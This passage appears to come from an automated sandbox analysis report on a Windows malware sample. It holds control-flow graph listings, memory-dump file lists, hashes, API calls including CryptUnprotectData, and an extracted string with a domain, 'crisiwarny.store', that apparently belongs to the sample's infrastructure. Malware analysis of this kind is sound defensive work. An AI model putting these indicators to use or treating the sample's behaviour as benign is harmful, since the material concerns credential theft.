                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Ehrd$crisiwarny.store$i[k]$n|of$txLL
                                                                                                      • API String ID: 0-3158903925
                                                                                                      • Opcode ID: 103e6f71b8714d4155d491aebf6cc05c0cbe9280f85599d9e6b9153cf3ddb311
                                                                                                      • Instruction ID: 23054f7b3e5595e7d9f8839f819a8fe258789cf8e315707cef67955c448fc700
                                                                                                      • Opcode Fuzzy Hash: 103e6f71b8714d4155d491aebf6cc05c0cbe9280f85599d9e6b9153cf3ddb311
                                                                                                      • Instruction Fuzzy Hash: 1A0216759083508FD314DF29EC8236BBBE1FB85304F148A6CE5D99B366E7358909CB92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 491 87cf90-87cfaf 492 87cfb0-87cfd3 491->492 492->492 493 87cfd5-87cfdf call 8aff20 492->493 496 87cfe5-87cfec call 8a8d10 493->496 497 87d1c4-87d1cf ExitProcess 493->497 500 87cff2-87d0a5 496->500 501 87d1bf call 8b0de0 496->501 504 87d0b0-87d0c2 500->504 501->497 504->504 505 87d0c4-87d0c7 504->505 506 87d0cd-87d101 505->506 507 87d19c-87d1a4 505->507 508 87d110-87d12d 506->508 511 87d1a6-87d1ab 507->511 512 87d1ac-87d1b3 call 87e1a0 507->512 508->508 510 87d12f-87d158 508->510 513 87d160-87d181 510->513 511->512 512->501 518 87d1b5 call 880b90 512->518 513->513 515 87d183-87d19b 513->515 515->507 521 87d1ba call 87fa70 518->521 521->501
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0087D1C7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: 89
                                                                                                      • API String ID: 621844428-155395596
                                                                                                      • Opcode ID: c4fc627f20ba0477608d73c6183cf44a15d20deb40f9aef815fcf2b0fcce2474
                                                                                                      • Instruction ID: d60607993152c48560e841e27b7e01e37842a862a3ce8ac5db569ebcc2b27060
                                                                                                      • Opcode Fuzzy Hash: c4fc627f20ba0477608d73c6183cf44a15d20deb40f9aef815fcf2b0fcce2474
                                                                                                      • Instruction Fuzzy Hash: D751676275871057E318AA748C563BFBBD1EF82718F198D2CD9C6EB2C2D968CC058792

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 592 88d7f8-88d820 call 87c890 call 8b4880 597 88d858 592->597 598 88d9c8-88d9ca 592->598 599 88db98-88dba2 592->599 600 88d879-88d88e call 873dc0 592->600 601 88d89a-88d8a2 call 87c890 592->601 602 88db7e 592->602 603 88d9bf 592->603 604 88d8a5-88d8b3 592->604 605 88d827-88d851 call 87c880 call 8b4950 592->605 597->600 608 88d9d0-88d9d6 598->608 607 88dbb0-88dbb9 599->607 600->601 601->604 602->599 603->598 611 88d8c0-88d8e1 604->611 605->597 605->598 605->599 605->600 605->601 605->602 605->603 605->604 607->607 614 88dbbb-88dbbe 607->614 608->608 615 88d9d8-88d9e9 608->615 611->611 612 88d8e3-88d8eb 611->612 618 88d92a-88d97f call 874700 612->618 619 88d8ed-88d8f8 612->619 621 88dbc0-88dbc5 614->621 622 88dbc7 614->622 623 88d9eb-88d9ee 615->623 624 88d9f0 615->624 640 88d980-88d9a1 618->640 625 88d900-88d907 619->625 627 88dbca-88dc05 call 87c880 621->627 622->627 623->624 628 88d9f1-88d9fc 623->628 624->628 630 88d909-88d90c 625->630 631 88d910-88d916 625->631 642 88dc10-88dc41 627->642 633 88d9fe-88da01 628->633 634 88da03 628->634 630->625 636 88d90e 630->636 631->618 637 88d918-88d927 call 8b0f10 631->637 633->634 639 88da04-88da1e call 87c880 633->639 634->639 636->618 637->618 651 88db1c-88db77 call 8b3a90 CryptUnprotectData 639->651 652 88da24-88da2b 639->652 640->640 644 88d9a3-88d9b8 call 874840 640->644 642->642 646 88dc43-88dc4c 642->646 644->598 644->599 644->602 644->603 654 88dcc2 644->654 649 88dc4e-88dc54 646->649 650 88dc71-88dc7f 646->650 655 88dc60-88dc6f 649->655 657 88dc81-88dc87 650->657 658 88dca3 650->658 651->599 651->602 651->654 659 88da43-88da8d call 8923f0 * 2 652->659 654->654 655->650 655->655 663 88dc90-88dc9f 657->663 661 88dca6-88dcbc call 87d220 658->661 670 88da8f-88daa4 call 8923f0 659->670 671 88da30-88da3d 659->671 661->654 663->663 664 88dca1 663->664 664->661 670->671 674 88daa6-88dad9 670->674 671->651 671->659 674->671 675 88dadf-88dafc call 8923f0 674->675 675->671 678 88db02-88db17 675->678 678->671
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e00fe18414ece901bf7219b1bc85598fd163feabc2bb22ea47e9473c417aa928
                                                                                                      • Instruction ID: 3e7f664a136e3466ed593f73816d8f4708ed1a05a16390fd2fada09d47797cf6
                                                                                                      • Opcode Fuzzy Hash: e00fe18414ece901bf7219b1bc85598fd163feabc2bb22ea47e9473c417aa928
                                                                                                      • Instruction Fuzzy Hash: 31D100B5504741CFD7249F28C881B23BBE2FF49314F188A68D49ACB796E734E845CB52

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 679 88104f-88107f call 87c890 call 874700 684 881080-8810a5 679->684 684->684 685 8810a7-8810ba call 874780 684->685 688 881368-881369 call 8a6d70 685->688 689 88133a-881350 call 87d1d0 call 89f6e0 685->689 690 88149f-8814b0 call 874970 685->690 691 8810d0-8810de 685->691 692 881290-8812b9 call 87d1d0 call 8979b0 call 87da80 call 87d1d0 call 898090 685->692 693 8810c1-8810c9 call 8ab0f0 685->693 694 881371-8813a2 call 87da80 CoUninitialize 685->694 695 8811e2-881286 call 87d1d0 call 8979b0 call 87da80 call 87d1d0 call 898090 call 87da80 call 87d1d0 call 898290 call 87da80 call 87d1d0 call 89a040 call 89ab20 call 89b070 call 89dba0 call 87da80 call 87d1d0 call 89cbd0 call 87da80 685->695 711 88136e 688->711 719 881355-881361 call 8a6b70 689->719 726 881e76-881e7f 690->726 701 8810e0-8810fd 691->701 748 8812be-881334 call 87da80 call 87d1d0 call 898290 call 87da80 call 87d1d0 call 89a040 call 89ab20 call 89b070 call 89dba0 call 87da80 call 87d1d0 call 89cbd0 call 87da80 692->748 693->688 693->689 693->690 693->691 693->692 693->694 693->695 713 8813b0-88141a 694->713 695->692 701->701 709 8810ff-88112b call 874780 701->709 727 881130-881142 709->727 711->694 713->713 718 88141c-881441 713->718 724 881450-88148c 718->724 719->688 719->694 724->724 731 88148e-8814aa 724->731 727->727 733 881144-88116f call 874780 727->733 744 881468-88148c 731->744 745 8814ac-8814ad 731->745 741 881170-8811b3 733->741 741->741 746 8811b5-8811c6 call 874780 call 881e90 741->746 744->724 744->731 753 8814af-8814b0 745->753 754 8814e0-8815af 745->754 763 8811cb-8811d9 call 874970 746->763 748->689 753->726 756 8815b0-8815c5 754->756 756->756 760 8815c7-8815d0 756->760 764 8815f1-8815fc 760->764 765 8815d2-8815d8 760->765 763->695 771 8815fe-881601 764->771 772 881621-8816dc call 8b3a90 764->772 769 8815e0-8815ef 765->769 769->764 769->769 776 881610-88161f 771->776 787 8816e8-8816f7 772->787 788 8816e3 772->788 776->772 776->776 792 881700-881728 787->792 791 881e2e-881e60 call 87d210 * 6 788->791 791->726 792->792 796 88172a-881732 792->796 800 881769-88177a 796->800 801 881734-881739 796->801 808 881780-8817a8 800->808 805 88173f-881746 801->805 810 881748-88174b 805->810 811 88174f-881755 805->811 808->808 814 8817aa-8817b2 808->814 810->805 817 88174d 810->817 811->800 819 881757-881766 call 8b0f10 811->819 814->791 815 8817b8-8817bd 814->815 821 8817c3-8817ca 815->821 817->800 819->800 826 8817cc-8817cf 821->826 827 8817d6-8817dc 821->827 826->821 833 8817d1 826->833 827->791 834 8817e2-8817f4 call 8b0f10 827->834 833->791 834->791
                                                                                                      APIs
                                                                                                      • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00881379
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Uninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3861434553-0
                                                                                                      • Opcode ID: af760b0e27b1ab10656a924e5c44e490ca69239bb7013e55a82bbaf64f692046
                                                                                                      • Instruction ID: f8e132d8baf3a3efcb35734c23a0bd16ddd8fb9ce9f6209fcfb5ac1a05c9d091
                                                                                                      • Opcode Fuzzy Hash: af760b0e27b1ab10656a924e5c44e490ca69239bb7013e55a82bbaf64f692046
                                                                                                      • Instruction Fuzzy Hash: 04B12AB5A007408BD714AB389CD262BB7A6FF95314F08953CE84B87787EB39E4058763
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 008AE2A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
